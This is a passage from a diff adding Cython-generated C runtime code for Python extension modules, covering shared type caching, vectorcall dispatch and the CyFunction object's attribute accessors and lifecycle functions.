__Pyx_FetchSharedCythonABIModule(); + if (!abi_module) return NULL; + object_name = strrchr(type->tp_name, '.'); + object_name = object_name ? object_name+1 : type->tp_name; + cached_type = (PyTypeObject*) PyObject_GetAttrString(abi_module, object_name); + if (cached_type) { + if (__Pyx_VerifyCachedType( + (PyObject *)cached_type, + object_name, + cached_type->tp_basicsize, + type->tp_basicsize) < 0) { + goto bad; + } + goto done; + } + if (!PyErr_ExceptionMatches(PyExc_AttributeError)) goto bad; + PyErr_Clear(); + if (PyType_Ready(type) < 0) goto bad; + if (PyObject_SetAttrString(abi_module, object_name, (PyObject *)type) < 0) + goto bad; + Py_INCREF(type); + cached_type = type; +done: + Py_DECREF(abi_module); + return cached_type; +bad: + Py_XDECREF(cached_type); + cached_type = NULL; + goto done; +} +#else +static PyTypeObject *__Pyx_FetchCommonTypeFromSpec(PyObject *module, PyType_Spec *spec, PyObject *bases) { + PyObject *abi_module, *cached_type = NULL; + const char* object_name = strrchr(spec->name, '.'); + object_name = object_name ? object_name+1 : spec->name; + abi_module = __Pyx_FetchSharedCythonABIModule(); + if (!abi_module) return NULL; + cached_type = PyObject_GetAttrString(abi_module, object_name); + if (cached_type) { + Py_ssize_t basicsize; +#if CYTHON_COMPILING_IN_LIMITED_API + PyObject *py_basicsize; + py_basicsize = PyObject_GetAttrString(cached_type, "__basicsize__"); + if (unlikely(!py_basicsize)) goto bad; + basicsize = PyLong_AsSsize_t(py_basicsize); + Py_DECREF(py_basicsize); + py_basicsize = 0; + if (unlikely(basicsize == (Py_ssize_t)-1) && PyErr_Occurred()) goto bad; +#else + basicsize = likely(PyType_Check(cached_type)) ? ((PyTypeObject*) cached_type)->tp_basicsize : -1; +#endif + if (__Pyx_VerifyCachedType( + cached_type, + object_name, + basicsize, + spec->basicsize) < 0) { + goto bad; + } + goto done; + } + if (!PyErr_ExceptionMatches(PyExc_AttributeError)) goto bad; + PyErr_Clear(); + CYTHON_UNUSED_VAR(module); + cached_type = __Pyx_PyType_FromModuleAndSpec(abi_module, spec, bases); + if (unlikely(!cached_type)) goto bad; + if (unlikely(__Pyx_fix_up_extension_type_from_spec(spec, (PyTypeObject *) cached_type) < 0)) goto bad; + if (PyObject_SetAttrString(abi_module, object_name, cached_type) < 0) goto bad; +done: + Py_DECREF(abi_module); + assert(cached_type == NULL || PyType_Check(cached_type)); + return (PyTypeObject *) cached_type; +bad: + Py_XDECREF(cached_type); + cached_type = NULL; + goto done; +} +#endif + +/* PyVectorcallFastCallDict */ +#if CYTHON_METH_FASTCALL +static PyObject *__Pyx_PyVectorcall_FastCallDict_kw(PyObject *func, __pyx_vectorcallfunc vc, PyObject *const *args, size_t nargs, PyObject *kw) +{ + PyObject *res = NULL; + PyObject *kwnames; + PyObject **newargs; + PyObject **kwvalues; + Py_ssize_t i, pos; + size_t j; + PyObject *key, *value; + unsigned long keys_are_strings; + Py_ssize_t nkw = PyDict_GET_SIZE(kw); + newargs = (PyObject **)PyMem_Malloc((nargs + (size_t)nkw) * sizeof(args[0])); + if (unlikely(newargs == NULL)) { + PyErr_NoMemory(); + return NULL; + } + for (j = 0; j < nargs; j++) newargs[j] = args[j]; + kwnames = PyTuple_New(nkw); + if (unlikely(kwnames == NULL)) { + PyMem_Free(newargs); + return NULL; + } + kwvalues = newargs + nargs; + pos = i = 0; + keys_are_strings = Py_TPFLAGS_UNICODE_SUBCLASS; + while (PyDict_Next(kw, &pos, &key, &value)) { + keys_are_strings &= Py_TYPE(key)->tp_flags; + Py_INCREF(key); + Py_INCREF(value); + PyTuple_SET_ITEM(kwnames, i, key); + kwvalues[i] = value; + i++; + } + if (unlikely(!keys_are_strings)) { + PyErr_SetString(PyExc_TypeError, "keywords must be strings"); + goto cleanup; + } + res = vc(func, newargs, nargs, kwnames); +cleanup: + Py_DECREF(kwnames); + for (i = 0; i < nkw; i++) + Py_DECREF(kwvalues[i]); + PyMem_Free(newargs); + return res; +} +static CYTHON_INLINE PyObject *__Pyx_PyVectorcall_FastCallDict(PyObject *func, __pyx_vectorcallfunc vc, PyObject *const *args, size_t nargs, PyObject *kw) +{ + if (likely(kw == NULL) || PyDict_GET_SIZE(kw) == 0) { + return vc(func, args, nargs, NULL); + } + return __Pyx_PyVectorcall_FastCallDict_kw(func, vc, args, nargs, kw); +} +#endif + +/* CythonFunctionShared */ +static CYTHON_INLINE void __Pyx__CyFunction_SetClassObj(__pyx_CyFunctionObject* f, PyObject* classobj) { +#if PY_VERSION_HEX < 0x030900B1 + __Pyx_Py_XDECREF_SET( + __Pyx_CyFunction_GetClassObj(f), + ((classobj) ? __Pyx_NewRef(classobj) : NULL)); +#else + __Pyx_Py_XDECREF_SET( + ((PyCMethodObject *) (f))->mm_class, + (PyTypeObject*)((classobj) ? __Pyx_NewRef(classobj) : NULL)); +#endif +} +static PyObject * +__Pyx_CyFunction_get_doc(__pyx_CyFunctionObject *op, void *closure) +{ + CYTHON_UNUSED_VAR(closure); + if (unlikely(op->func_doc == NULL)) { + if (((PyCFunctionObject*)op)->m_ml->ml_doc) { +#if PY_MAJOR_VERSION >= 3 + op->func_doc = PyUnicode_FromString(((PyCFunctionObject*)op)->m_ml->ml_doc); +#else + op->func_doc = PyString_FromString(((PyCFunctionObject*)op)->m_ml->ml_doc); +#endif + if (unlikely(op->func_doc == NULL)) + return NULL; + } else { + Py_INCREF(Py_None); + return Py_None; + } + } + Py_INCREF(op->func_doc); + return op->func_doc; +} +static int +__Pyx_CyFunction_set_doc(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (value == NULL) { + value = Py_None; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->func_doc, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_name(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (unlikely(op->func_name == NULL)) { +#if PY_MAJOR_VERSION >= 3 + op->func_name = PyUnicode_InternFromString(((PyCFunctionObject*)op)->m_ml->ml_name); +#else + op->func_name = PyString_InternFromString(((PyCFunctionObject*)op)->m_ml->ml_name); +#endif + if (unlikely(op->func_name == NULL)) + return NULL; + } + Py_INCREF(op->func_name); + return op->func_name; +} +static int +__Pyx_CyFunction_set_name(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); +#if PY_MAJOR_VERSION >= 3 + if (unlikely(value == NULL || !PyUnicode_Check(value))) +#else + if (unlikely(value == NULL || !PyString_Check(value))) +#endif + { + PyErr_SetString(PyExc_TypeError, + "__name__ must be set to a string object"); + return -1; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->func_name, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_qualname(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + Py_INCREF(op->func_qualname); + return op->func_qualname; +} +static int +__Pyx_CyFunction_set_qualname(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); +#if PY_MAJOR_VERSION >= 3 + if (unlikely(value == NULL || !PyUnicode_Check(value))) +#else + if (unlikely(value == NULL || !PyString_Check(value))) +#endif + { + PyErr_SetString(PyExc_TypeError, + "__qualname__ must be set to a string object"); + return -1; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->func_qualname, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_dict(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (unlikely(op->func_dict == NULL)) { + op->func_dict = PyDict_New(); + if (unlikely(op->func_dict == NULL)) + return NULL; + } + Py_INCREF(op->func_dict); + return op->func_dict; +} +static int +__Pyx_CyFunction_set_dict(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (unlikely(value == NULL)) { + PyErr_SetString(PyExc_TypeError, + "function's dictionary may not be deleted"); + return -1; + } + if (unlikely(!PyDict_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "setting function's dictionary to a non-dict"); + return -1; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->func_dict, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_globals(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + Py_INCREF(op->func_globals); + return op->func_globals; +} +static PyObject * +__Pyx_CyFunction_get_closure(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(op); + CYTHON_UNUSED_VAR(context); + Py_INCREF(Py_None); + return Py_None; +} +static PyObject * +__Pyx_CyFunction_get_code(__pyx_CyFunctionObject *op, void *context) +{ + PyObject* result = (op->func_code) ? op->func_code : Py_None; + CYTHON_UNUSED_VAR(context); + Py_INCREF(result); + return result; +} +static int +__Pyx_CyFunction_init_defaults(__pyx_CyFunctionObject *op) { + int result = 0; + PyObject *res = op->defaults_getter((PyObject *) op); + if (unlikely(!res)) + return -1; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + op->defaults_tuple = PyTuple_GET_ITEM(res, 0); + Py_INCREF(op->defaults_tuple); + op->defaults_kwdict = PyTuple_GET_ITEM(res, 1); + Py_INCREF(op->defaults_kwdict); + #else + op->defaults_tuple = PySequence_ITEM(res, 0); + if (unlikely(!op->defaults_tuple)) result = -1; + else { + op->defaults_kwdict = PySequence_ITEM(res, 1); + if (unlikely(!op->defaults_kwdict)) result = -1; + } + #endif + Py_DECREF(res); + return result; +} +static int +__Pyx_CyFunction_set_defaults(__pyx_CyFunctionObject *op, PyObject* value, void *context) { + CYTHON_UNUSED_VAR(context); + if (!value) { + value = Py_None; + } else if (unlikely(value != Py_None && !PyTuple_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "__defaults__ must be set to a tuple object"); + return -1; + } + PyErr_WarnEx(PyExc_RuntimeWarning, "changes to cyfunction.__defaults__ will not " + "currently affect the values used in function calls", 1); + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->defaults_tuple, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_defaults(__pyx_CyFunctionObject *op, void *context) { + PyObject* result = op->defaults_tuple; + CYTHON_UNUSED_VAR(context); + if (unlikely(!result)) { + if (op->defaults_getter) { + if (unlikely(__Pyx_CyFunction_init_defaults(op) < 0)) return NULL; + result = op->defaults_tuple; + } else { + result = Py_None; + } + } + Py_INCREF(result); + return result; +} +static int +__Pyx_CyFunction_set_kwdefaults(__pyx_CyFunctionObject *op, PyObject* value, void *context) { + CYTHON_UNUSED_VAR(context); + if (!value) { + value = Py_None; + } else if (unlikely(value != Py_None && !PyDict_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "__kwdefaults__ must be set to a dict object"); + return -1; + } + PyErr_WarnEx(PyExc_RuntimeWarning, "changes to cyfunction.__kwdefaults__ will not " + "currently affect the values used in function calls", 1); + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->defaults_kwdict, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_kwdefaults(__pyx_CyFunctionObject *op, void *context) { + PyObject* result = op->defaults_kwdict; + CYTHON_UNUSED_VAR(context); + if (unlikely(!result)) { + if (op->defaults_getter) { + if (unlikely(__Pyx_CyFunction_init_defaults(op) < 0)) return NULL; + result = op->defaults_kwdict; + } else { + result = Py_None; + } + } + Py_INCREF(result); + return result; +} +static int +__Pyx_CyFunction_set_annotations(__pyx_CyFunctionObject *op, PyObject* value, void *context) { + CYTHON_UNUSED_VAR(context); + if (!value || value == Py_None) { + value = NULL; + } else if (unlikely(!PyDict_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "__annotations__ must be set to a dict object"); + return -1; + } + Py_XINCREF(value); + __Pyx_Py_XDECREF_SET(op->func_annotations, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_annotations(__pyx_CyFunctionObject *op, void *context) { + PyObject* result = op->func_annotations; + CYTHON_UNUSED_VAR(context); + if (unlikely(!result)) { + result = PyDict_New(); + if (unlikely(!result)) return NULL; + op->func_annotations = result; + } + Py_INCREF(result); + return result; +} +static PyObject * +__Pyx_CyFunction_get_is_coroutine(__pyx_CyFunctionObject *op, void *context) { + int is_coroutine; + CYTHON_UNUSED_VAR(context); + if (op->func_is_coroutine) { + return __Pyx_NewRef(op->func_is_coroutine); + } + is_coroutine = op->flags & __Pyx_CYFUNCTION_COROUTINE; +#if PY_VERSION_HEX >= 0x03050000 + if (is_coroutine) { + PyObject *module, *fromlist, *marker = __pyx_n_s_is_coroutine; + fromlist = PyList_New(1); + if (unlikely(!fromlist)) return NULL; + Py_INCREF(marker); + PyList_SET_ITEM(fromlist, 0, marker); + module = PyImport_ImportModuleLevelObject(__pyx_n_s_asyncio_coroutines, NULL, NULL, fromlist, 0); + Py_DECREF(fromlist); + if (unlikely(!module)) goto ignore; + op->func_is_coroutine = __Pyx_PyObject_GetAttrStr(module, marker); + Py_DECREF(module); + if (likely(op->func_is_coroutine)) { + return __Pyx_NewRef(op->func_is_coroutine); + } +ignore: + PyErr_Clear(); + } +#endif + op->func_is_coroutine = __Pyx_PyBool_FromLong(is_coroutine); + return __Pyx_NewRef(op->func_is_coroutine); +} +static PyGetSetDef __pyx_CyFunction_getsets[] = { + {(char *) "func_doc", (getter)__Pyx_CyFunction_get_doc, (setter)__Pyx_CyFunction_set_doc, 0, 0}, + {(char *) "__doc__", (getter)__Pyx_CyFunction_get_doc, (setter)__Pyx_CyFunction_set_doc, 0, 0}, + {(char *) "func_name", (getter)__Pyx_CyFunction_get_name, (setter)__Pyx_CyFunction_set_name, 0, 0}, + {(char *) "__name__", (getter)__Pyx_CyFunction_get_name, (setter)__Pyx_CyFunction_set_name, 0, 0}, + {(char *) "__qualname__", (getter)__Pyx_CyFunction_get_qualname, (setter)__Pyx_CyFunction_set_qualname, 0, 0}, + {(char *) "func_dict", (getter)__Pyx_CyFunction_get_dict, (setter)__Pyx_CyFunction_set_dict, 0, 0}, + {(char *) "__dict__", (getter)__Pyx_CyFunction_get_dict, (setter)__Pyx_CyFunction_set_dict, 0, 0}, + {(char *) "func_globals", (getter)__Pyx_CyFunction_get_globals, 0, 0, 0}, + {(char *) "__globals__", (getter)__Pyx_CyFunction_get_globals, 0, 0, 0}, + {(char *) "func_closure", (getter)__Pyx_CyFunction_get_closure, 0, 0, 0}, + {(char *) "__closure__", (getter)__Pyx_CyFunction_get_closure, 0, 0, 0}, + {(char *) "func_code", (getter)__Pyx_CyFunction_get_code, 0, 0, 0}, + {(char *) "__code__", (getter)__Pyx_CyFunction_get_code, 0, 0, 0}, + {(char *) "func_defaults", (getter)__Pyx_CyFunction_get_defaults, (setter)__Pyx_CyFunction_set_defaults, 0, 0}, + {(char *) "__defaults__", (getter)__Pyx_CyFunction_get_defaults, (setter)__Pyx_CyFunction_set_defaults, 0, 0}, + {(char *) "__kwdefaults__", (getter)__Pyx_CyFunction_get_kwdefaults, (setter)__Pyx_CyFunction_set_kwdefaults, 0, 0}, + {(char *) "__annotations__", (getter)__Pyx_CyFunction_get_annotations, (setter)__Pyx_CyFunction_set_annotations, 0, 0}, + {(char *) "_is_coroutine", (getter)__Pyx_CyFunction_get_is_coroutine, 0, 0, 0}, + {0, 0, 0, 0, 0} +}; +static PyMemberDef __pyx_CyFunction_members[] = { + {(char *) "__module__", T_OBJECT, offsetof(PyCFunctionObject, m_module), 0, 0}, +#if CYTHON_USE_TYPE_SPECS + {(char *) "__dictoffset__", T_PYSSIZET, offsetof(__pyx_CyFunctionObject, func_dict), READONLY, 0}, +#if CYTHON_METH_FASTCALL +#if CYTHON_BACKPORT_VECTORCALL + {(char *) "__vectorcalloffset__", T_PYSSIZET, offsetof(__pyx_CyFunctionObject, func_vectorcall), READONLY, 0}, +#else + {(char *) "__vectorcalloffset__", T_PYSSIZET, offsetof(PyCFunctionObject, vectorcall), READONLY, 0}, +#endif +#endif +#if PY_VERSION_HEX < 0x030500A0 + {(char *) "__weaklistoffset__", T_PYSSIZET, offsetof(__pyx_CyFunctionObject, func_weakreflist), READONLY, 0}, +#else + {(char *) "__weaklistoffset__", T_PYSSIZET, offsetof(PyCFunctionObject, m_weakreflist), READONLY, 0}, +#endif +#endif + {0, 0, 0, 0, 0} +}; +static PyObject * +__Pyx_CyFunction_reduce(__pyx_CyFunctionObject *m, PyObject *args) +{ + CYTHON_UNUSED_VAR(args); +#if PY_MAJOR_VERSION >= 3 + Py_INCREF(m->func_qualname); + return m->func_qualname; +#else + return PyString_FromString(((PyCFunctionObject*)m)->m_ml->ml_name); +#endif +} +static PyMethodDef __pyx_CyFunction_methods[] = { + {"__reduce__", (PyCFunction)__Pyx_CyFunction_reduce, METH_VARARGS, 0}, + {0, 0, 0, 0} +}; +#if PY_VERSION_HEX < 0x030500A0 +#define __Pyx_CyFunction_weakreflist(cyfunc) ((cyfunc)->func_weakreflist) +#else +#define __Pyx_CyFunction_weakreflist(cyfunc) (((PyCFunctionObject*)cyfunc)->m_weakreflist) +#endif +static PyObject *__Pyx_CyFunction_Init(__pyx_CyFunctionObject *op, PyMethodDef *ml, int flags, PyObject* qualname, + PyObject *closure, PyObject *module, PyObject* globals, PyObject* code) { + PyCFunctionObject *cf = (PyCFunctionObject*) op; + if (unlikely(op == NULL)) + return NULL; + op->flags = flags; + __Pyx_CyFunction_weakreflist(op) = NULL; + cf->m_ml = ml; + cf->m_self = (PyObject *) op; + Py_XINCREF(closure); + op->func_closure = closure; + Py_XINCREF(module); + cf->m_module = module; + op->func_dict = NULL; + op->func_name = NULL; + Py_INCREF(qualname); + op->func_qualname = qualname; + op->func_doc = NULL; +#if PY_VERSION_HEX < 0x030900B1 + op->func_classobj = NULL; +#else + ((PyCMethodObject*)op)->mm_class = NULL; +#endif + op->func_globals = globals; + Py_INCREF(op->func_globals); + Py_XINCREF(code); + op->func_code = code; + op->defaults_pyobjects = 0; + op->defaults_size = 0; + op->defaults = NULL; + op->defaults_tuple = NULL; + op->defaults_kwdict = NULL; + op->defaults_getter = NULL; + op->func_annotations = NULL; + op->func_is_coroutine = NULL; +#if CYTHON_METH_FASTCALL + switch (ml->ml_flags & (METH_VARARGS | METH_FASTCALL | METH_NOARGS | METH_O | METH_KEYWORDS | METH_METHOD)) { + case METH_NOARGS: + __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_NOARGS; + break; + case METH_O: + __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_O; + break; + case METH_METHOD | METH_FASTCALL | METH_KEYWORDS: + __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS_METHOD; + break; + case METH_FASTCALL | METH_KEYWORDS: + __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS; + break; + case METH_VARARGS | METH_KEYWORDS: + __Pyx_CyFunction_func_vectorcall(op) = NULL; + break; + default: + PyErr_SetString(PyExc_SystemError, "Bad call flags for CyFunction"); + Py_DECREF(op); + return NULL; + } +#endif + return (PyObject *) op; +} +static int +__Pyx_CyFunction_clear(__pyx_CyFunctionObject *m) +{ + Py_CLEAR(m->func_closure); + Py_CLEAR(((PyCFunctionObject*)m)->m_module); + Py_CLEAR(m->func_dict); + Py_CLEAR(m->func_name); + Py_CLEAR(m->func_qualname); + Py_CLEAR(m->func_doc); + Py_CLEAR(m->func_globals); + Py_CLEAR(m->func_code); +#if PY_VERSION_HEX < 0x030900B1 + Py_CLEAR(__Pyx_CyFunction_GetClassObj(m)); +#else + { + PyObject *cls = (PyObject*) ((PyCMethodObject *) (m))->mm_class; + ((PyCMethodObject *) (m))->mm_class = NULL; + Py_XDECREF(cls); + } +#endif + Py_CLEAR(m->defaults_tuple); + Py_CLEAR(m->defaults_kwdict); + Py_CLEAR(m->func_annotations); + Py_CLEAR(m->func_is_coroutine); + if (m->defaults) { + PyObject **pydefaults = __Pyx_CyFunction_Defaults(PyObject *, m); + int i; + for (i = 0; i < m->defaults_pyobjects; i++) + Py_XDECREF(pydefaults[i]); + PyObject_Free(m->defaults); + m->defaults = NULL; + } + return 0; +} +static void __Pyx__CyFunction_dealloc(__pyx_CyFunctionObject *m) +{ + if (__Pyx_CyFunction_weakreflist(m) != NULL) + PyObject_ClearWeakRefs((PyObject *) m); + __Pyx_CyFunction_clear(m); + __Pyx_PyHeapTypeObject_GC_Del(m); +} +static void __Pyx_CyFunction_dealloc(__pyx_CyFunctionObject *m) +{ + PyObject_GC_UnTrack(m); + __Pyx__CyFunction_dealloc(m); +} +static int __Pyx_CyFunction_traverse(__pyx_CyFunctionObject *m, visitproc visit, void *arg) +{ + Py_VISIT(m->func_closure); + Py_VISIT(((PyCFunctionObject*)m)->m_module); + Py_VISIT(m->func_dict); + Py_VISIT(m->func_name); + Py_VISIT(m->func_qualname); + Py_VISIT(m->func_doc); + Py_VISIT(m->func_globals); + Py_VISIT(m->func_code); + Py_VISIT(__Pyx_CyFunction_GetClassObj(m)); + Py_VISIT(m->defaults_tuple); + Py_VISIT(m->defaults_kwdict); + Py_VISIT(m->func_is_coroutine); + if (m->defaults) { + PyObject **pydefaults = __Pyx_CyFunction_Defaults(PyObject *, m); + int i; + for (i = 0; i < m->defaults_pyobjects; i++) + Py_VISIT(pydefaults[i]); + } + return 0; +} +static PyObject* +__Pyx_CyFunction_repr(__pyx_CyFunctionObject *op) +{ +#if PY_MAJOR_VERSION >= 3 + return PyUnicode_FromFormat("", + op->func_qualname, (void *)op); +#else + return PyString_FromFormat("", + PyString_AsString(op->func_qualname), (void *)op); +#endif +} +static PyObject * __Pyx_CyFunction_CallMethod(PyObject *func, PyObject *self, PyObject *arg, PyObject *kw) { + PyCFunctionObject* f = (PyCFunctionObject*)func; + PyCFunction meth = f->m_ml->ml_meth; + Py_ssize_t size; + switch (f->m_ml->ml_flags & (METH_VARARGS | METH_KEYWORDS | METH_NOARGS | METH_O)) { + case METH_VARARGS: + if (likely(kw == NULL || PyDict_Size(kw) == 0)) + return (*meth)(self, arg); + break; + case METH_VARARGS | METH_KEYWORDS: + return (*(PyCFunctionWithKeywords)(void*)meth)(self, arg, kw); + case METH_NOARGS: + if (likely(kw == NULL || PyDict_Size(kw) == 0)) { + size = PyTuple_GET_SIZE(arg); + if (likely(size == 0)) + return (*meth)(self, NULL); + PyErr_Format(PyExc_TypeError, + "%.200s() takes no arguments (%" CYTHON_FORMAT_SSIZE_T "d given)", + f->m_ml->ml_name, size); + return NULL; + } + break; + case METH_O: + if (likely(kw == NULL || PyDict_Size(kw) == 0)) { + size = PyTuple_GET_SIZE(arg); + if (likely(size == 1)) { + PyObject *result, *arg0; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + arg0 = PyTuple_GET_ITEM(arg, 0); + #else + arg0 = PySequence_ITEM(arg, 0); if (unlikely(!arg0)) return NULL; + #endif + result = (*meth)(self, arg0); + #if !(CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS) + Py_DECREF(arg0); + #endif + return result; + } + PyErr_Format(PyExc_TypeError, + "%.200s() takes exactly one argument (%" CYTHON_FORMAT_SSIZE_T "d given)", + f->m_ml->ml_name, size); + return NULL; + } + break; + default: + PyErr_SetString(PyExc_SystemError, "Bad call flags for CyFunction"); + return NULL; + } + PyErr_Format(PyExc_TypeError, "%.200s() takes no keyword arguments", + f->m_ml->ml_name); + return NULL; +} +static CYTHON_INLINE PyObject *__Pyx_CyFunction_Call(PyObject *func, PyObject *arg, PyObject *kw) { + return __Pyx_CyFunction_CallMethod(func, ((PyCFunctionObject*)func)->m_self, arg, kw); +} +static PyObject *__Pyx_CyFunction_CallAsMethod(PyObject *func, PyObject *args, PyObject *kw) { + PyObject *result; + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *) func; +#if CYTHON_METH_FASTCALL + __pyx_vectorcallfunc vc = __Pyx_CyFunction_func_vectorcall(cyfunc); + if (vc) { +#if CYTHON_ASSUME_SAFE_MACROS + return __Pyx_PyVectorcall_FastCallDict(func, vc, &PyTuple_GET_ITEM(args, 0), (size_t)PyTuple_GET_SIZE(args), kw); +#else + (void) &__Pyx_PyVectorcall_FastCallDict; + return PyVectorcall_Call(func, args, kw); +#endif + } +#endif + if ((cyfunc->flags & __Pyx_CYFUNCTION_CCLASS) && !(cyfunc->flags & __Pyx_CYFUNCTION_STATICMETHOD)) { + Py_ssize_t argc; + PyObject *new_args; + PyObject *self; + argc = PyTuple_GET_SIZE(args); + new_args = PyTuple_GetSlice(args, 1, argc); + if (unlikely(!new_args)) + return NULL; + self = PyTuple_GetItem(args, 0); + if (unlikely(!self)) { + Py_DECREF(new_args); +#if PY_MAJOR_VERSION > 2 + PyErr_Format(PyExc_TypeError, + "unbound method %.200S() needs an argument", + cyfunc->func_qualname); +#else + PyErr_SetString(PyExc_TypeError, + "unbound method needs an argument"); +#endif + return NULL; + } + result = __Pyx_CyFunction_CallMethod(func, self, new_args, kw); + Py_DECREF(new_args); + } else { + result = __Pyx_CyFunction_Call(func, args, kw); + } + return result; +} +#if CYTHON_METH_FASTCALL +static CYTHON_INLINE int __Pyx_CyFunction_Vectorcall_CheckArgs(__pyx_CyFunctionObject *cyfunc, Py_ssize_t nargs, PyObject *kwnames) +{ + int ret = 0; + if ((cyfunc->flags & __Pyx_CYFUNCTION_CCLASS) && !(cyfunc->flags & __Pyx_CYFUNCTION_STATICMETHOD)) { + if (unlikely(nargs < 1)) { + PyErr_Format(PyExc_TypeError, "%.200s() needs an argument", + ((PyCFunctionObject*)cyfunc)->m_ml->ml_name); + return -1; + } + ret = 1; + } + if (unlikely(kwnames) && unlikely(PyTuple_GET_SIZE(kwnames))) { + PyErr_Format(PyExc_TypeError, + "%.200s() takes no keyword arguments", ((PyCFunctionObject*)cyfunc)->m_ml->ml_name); + return -1; + } + return ret; +} +static PyObject * __Pyx_CyFunction_Vectorcall_NOARGS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, kwnames)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + if (unlikely(nargs != 0)) { + PyErr_Format(PyExc_TypeError, + "%.200s() takes no arguments (%" CYTHON_FORMAT_SSIZE_T "d given)", + def->ml_name, nargs); + return NULL; + } + return def->ml_meth(self, NULL); +} +static PyObject * __Pyx_CyFunction_Vectorcall_O(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, kwnames)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + if (unlikely(nargs != 1)) { + PyErr_Format(PyExc_TypeError, + "%.200s() takes exactly one argument (%" CYTHON_FORMAT_SSIZE_T "d given)", + def->ml_name, nargs); + return NULL; + } + return def->ml_meth(self, args[0]); +} +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, NULL)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + return ((_PyCFunctionFastWithKeywords)(void(*)(void))def->ml_meth)(self, args, nargs, kwnames); +} +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS_METHOD(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; + PyTypeObject *cls = (PyTypeObject *) __Pyx_CyFunction_GetClassObj(cyfunc); +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, NULL)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + return ((__Pyx_PyCMethod)(void(*)(void))def->ml_meth)(self, cls, args, (size_t)nargs, kwnames); +} +#endif +#if CYTHON_USE_TYPE_SPECS +static PyType_Slot __pyx_CyFunctionType_slots[] = { + {Py_tp_dealloc, (void 